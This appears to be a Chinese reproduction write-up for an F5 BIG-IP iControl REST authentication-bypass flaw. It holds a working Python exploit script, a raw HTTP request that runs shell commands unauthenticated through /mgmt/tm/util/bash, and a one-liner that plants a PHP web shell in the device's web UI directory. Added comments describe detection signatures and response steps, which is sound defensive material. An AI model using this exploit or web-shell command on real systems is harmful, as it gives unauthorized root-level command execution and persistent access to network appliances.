https://www.f5.com/trials
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2
import requests
import json
import ssl
import urllib3
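# Silence urllib3's warnings (including the one raised for unverified HTTPS
# requests). Both spellings are kept because older requests releases bundle
# their own urllib3 copy under requests.packages.
urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings()
# Certificate verification is intentionally NOT disabled process-wide here
# (e.g. by overriding ssl's private default-HTTPS-context factory): that would
# switch off verification for every stdlib HTTPS client in the process, while
# the only HTTPS call in this file already opts out per request with
# verify=False.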
def attack(target_url):
    """Check one BIG-IP management address for the iControl REST flaw shown on this page.

    Sends a single POST to ``/mgmt/tm/util/bash`` asking the device to run
    ``whoami`` and prints whether a ``commandResult`` came back. Nothing is
    returned; the verdict is printed (the messages are in Chinese: "target is
    vulnerable" / "response is" / "target is not vulnerable" / "url access
    error").

    Defender notes -- the request shape below is the detection signature:
      * POST to /mgmt/tm/util/bash from a client that holds no valid session.
      * ``Authorization: Basic YWRtaW46`` -- base64 of ``admin:`` (empty password).
      * A ``Connection`` header that names ``X-F5-Auth-Token``.
        NOTE(review): legitimate iControl REST clients presumably never list
        that header in Connection -- confirm against your own traffic baseline.
    Mitigation is the vendor fix plus keeping the management interface off
    untrusted networks; see the vendor advisory for affected versions.

    Args:
        target_url: Base URL of the management interface, e.g. ``https://host``.
    """
    # Fixed, harmless probe command; only its output is used as evidence.
    probe_command = 'whoami'
    endpoint = target_url + '/mgmt/tm/util/bash'
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        # Names the token header (and X-Forwarded-Host) as hop-by-hop.
        'Connection': 'Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host',
        # Placeholder token value; it is not a real session token.
        'X-F5-Auth-Token': 'a',
        # base64("admin:") -- user name with an empty password.
        'Authorization': 'Basic YWRtaW46'
    }
    payload = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(probe_command)}

    try:
        # verify=False: management interfaces commonly present self-signed certs.
        reply = requests.post(url=endpoint, json=payload, headers=request_headers, verify=False, timeout=5)
        confirmed = reply.status_code == 200 and 'commandResult' in reply.text
        if not confirmed:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
            return
        # A 200 carrying commandResult means the device executed the command.
        command_output = json.loads(reply.text)['commandResult']
        print("[+] 目标 {} 存在漏洞".format(target_url))
        print('[+] 响应为:{0}'.format(command_output))
    except Exception:
        # Any failure (network error, timeout, malformed JSON, missing key) is
        # reported with the same generic message; the cause is not shown.
        print('url 访问异常 {0}'.format(target_url))
if __name__ == "__main__":
    # Lab appliance on a private (RFC 1918) address.
    # NOTE(review): the trailing slash means the URL built by attack() contains
    # "//mgmt/tm/util/bash"; when searching proxy or device logs for this
    # probe, match both the single- and double-slash form of the path.
    target_url = "https://10.0.24.55/"
    print(target_url)
    attack(target_url)
POST /mgmt/tm/util/bash HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
Content-Type: application/json
X-F5-Auth-Token: a
Accept-Encoding: gzip
{
"command": "run",
"utilCmdArgs": "-c id"
}
# Post-exploitation example from the write-up. It remounts /usr read-write,
# writes a PHP file into the web UI script directory that hands the "cmd" query
# parameter to system(), then remounts /usr read-only again.
# Detection / response pointers taken from the command itself:
#   - an unexpected "mount -o remount" of /usr in audit or shell history
#   - new or modified files under /usr/local/www/xui/common/scripts/
#     (compare against a known-good image; note the "It works!" marker string)
#   - web requests to that path carrying a cmd= query parameter
# A device showing any of these should be treated as compromised rather than
# merely vulnerable: rebuild from trusted media and rotate credentials.
mount -o remount -rw /usr ;echo 'It works!<?php $a=$_GET["cmd"];system($a);?>' > /usr/local/www/xui/common/scripts/jquery.php;mount -o remount -r /usr
历史漏洞:
CVE-2021-22986:BIG-IP/BIG-IQ未授权RCE
CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现